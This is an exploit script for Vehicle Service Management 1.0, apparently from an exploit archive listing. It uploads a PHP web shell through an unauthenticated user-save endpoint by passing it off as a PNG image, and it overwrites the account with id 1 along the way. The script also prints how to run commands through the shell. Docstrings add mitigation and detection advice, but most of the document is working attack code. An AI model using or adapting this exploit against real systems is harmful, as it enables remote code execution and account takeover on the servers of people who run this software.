## https://sploitus.com/exploit?id=PACKETSTORM:164370
# Exploit Title: Vehicle Service Managment 1.0 - RCE (Unauthenticated)   
# Date: 2021-10-02  
# Exploit Author: RICHARD JONES  
# Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code  
# Version: v1.0  
# Tested on: Windows 10  
  
import requests  
  
# Base URL of the instance under test; the default points at a local install.
HOST = "http://localhost"
# Path the upload request is sent to. Nothing in this script logs in first,
# so the handler is reached without an authenticated session.
UPLOAD_URL = "/vehicle_service/classes/Users.php?f=save"

# Single HTTP session shared by the whole run.
s = requests.Session()
  
def sendShell():
    """Send one multipart POST to the user-save endpoint and report on HTTP 200.

    What the request shows about the server-side flaw:

    * No login precedes it, so the save handler accepts unauthenticated writes.
    * The uploaded part is named ``shell.php`` but declares ``image/png``; a
      handler that trusts the client-supplied content type will accept it.
    * Per the messages printed below, the file is expected to land in the
      web-served ``uploads/`` directory, prefixed with a server timestamp,
      where the PHP interpreter will execute it.

    Notes for anyone reproducing this against a lab copy or checking a fix:

    * The form also carries ``id=1`` with new username/password values;
      presumably this overwrites that account's record, so expect the lab
      instance's credentials to change. Confirm against the handler.
    * HTTP 200 is the only success test. It does not prove the file was
      written; check the uploads directory on the server.
    * The request goes through a local proxy on 127.0.0.1:8080 and fails if
      nothing is listening there.

    Mitigation: require an authenticated session on the save action, allowlist
    file extensions and verify content server-side rather than trusting the
    declared MIME type, and keep uploads outside the web root or disable
    script execution in that directory. For detection, look for session-less
    POSTs to this endpoint and for GET requests to ``uploads/*.php`` carrying
    a ``c`` query parameter.
    """
    # One-line PHP body that passes the ``c`` query parameter to system().
    php_body = "<?php system($_GET['c']);?>"

    # Ordinary form fields sent alongside the file part.
    form_fields = {
        "id": "1",
        "firstname": "Adminstrator",
        "lastname": "fake",
        "username": "fake",
        "password": "fake",
    }

    # requests file tuple: (filename, content, declared content type, headers).
    upload_part = {
        "img": (
            "shell.php",
            php_body,
            "image/png",
            {"Content-Disposition": "form-data"},
        ),
    }

    # Plain-HTTP traffic is routed through a local intercepting proxy.
    proxy_map = {"http": "http://127.0.0.1:8080"}

    response = s.post(
        f"{HOST}{UPLOAD_URL}",
        data=form_fields,
        proxies=proxy_map,
        files=upload_part,
    )
    if response.status_code != 200:
        # The original is silent on any non-200 answer.
        return

    print("[+] Shell upload successful")
    print(f"[-] Check in {HOST}/vehicle_service/uploads/ for the shell")
    print("[-] Usage: *shell.php?c=id")
    # Deliberately not an f-string: {SERVERTIME} is printed literally as a
    # placeholder for the prefix the server adds to the stored filename.
    print("[-] Ie: http://localhost/vehicle_service/uploads/{SERVERTIME}_shell.php?c=whoami")
  
def banner():
    """Return the tool's ASCII-art banner as a single newline-joined string.

    Rows are listed one per literal so the trailing spaces that are part of
    the original text stay visible and are preserved exactly.
    """
    rows = (
        "  ",
        "__ _______ __ __ __ ___   ",
        r"\ \ / / ____| \/ | /_ | / _ \   ",
        r"\ \ / / (___ | \ / | | || | | |  ",
        r"\ \/ / \___ \| |\/| | | || | | |  ",
        r"\ / ____) | | | | | || |_| |  ",
        r"\/ |_____/|_| |_| |_(_)___/   ",
        "  ",
        "",  # the text ends with a newline
    )
    return "\n".join(rows)
  
# Script entry: print the banner, the attribution line and a status line,
# then make the single upload attempt against HOST.
print(
    banner(),
    "Vehicle Service Managment 1.0 RCE ~ Created by Richard Jones",
    "[+] Trying shell upload",
    sep="\n",
)
sendShell()